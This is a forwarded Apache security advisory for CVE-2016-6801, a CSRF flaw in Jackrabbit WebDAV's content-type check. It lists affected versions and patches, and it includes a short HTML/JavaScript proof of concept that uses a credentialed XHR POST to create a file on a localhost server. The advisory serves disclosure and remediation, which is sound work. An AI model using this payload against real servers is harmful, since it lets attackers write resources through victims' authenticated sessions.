(FYI - forgot this mailing list in my initial mail)
-------- Forwarded Message --------
Subject: CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type
Date: Wed, 14 Sep 2016 14:34:22 +0200
From: Julian Reschke <resc...@apache.org>
Reply-To: d...@jackrabbit.apache.org
To: Lukas Reschke <lu...@statuscode.ch>, Jackrabbit Users
<us...@jackrabbit.apache.org>, d...@jackrabbit.apache.org
<d...@jackrabbit.apache.org>, secur...@apache.org <secur...@apache.org>,
oss-secur...@lists.openwall.com, bugt...@securityfocus.com
CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type
Severity: Important
Vendor:
The Apache Software Foundation
Versions Affected:
Apache Jackrabbit 2.4.5
Apache Jackrabbit 2.6.5
Apache Jackrabbit 2.8.2
Apache Jackrabbit 2.10.3
Apache Jackrabbit 2.12.3
Apache Jackrabbit 2.13.2
Description:
The CSRF content-type check for POST requests does not handle missing
Content-Type header fields, nor variations in field values with respect
to upper/lower case or optional parameters. This can be exploited to
create a resource via CSRF.
Mitigation:
2.4.x users upgrade to 2.4.5 and apply the patch in
http://svn.apache.org/r1758791 and/or upgrade to 2.4.6 once released
2.6.x users upgrade to 2.6.5 and apply the patch in
http://svn.apache.org/r1758771 and/or upgrade to 2.6.6 once released
2.8.x users upgrade to 2.8.2 and apply the patch in
http://svn.apache.org/r1758764 and/or upgrade to 2.8.3 once released
2.10.x users should upgrade to 2.10.4
2.12.x users should upgrade to 2.12.4
2.13.x users should upgrade to 2.13.3
Example:
A resource can be created like so:
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
xhr.withCredentials = true;
var body = "This file has been uploaded via CSRF.=\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
Credit:
This issue was discovered by Lukas Reschke.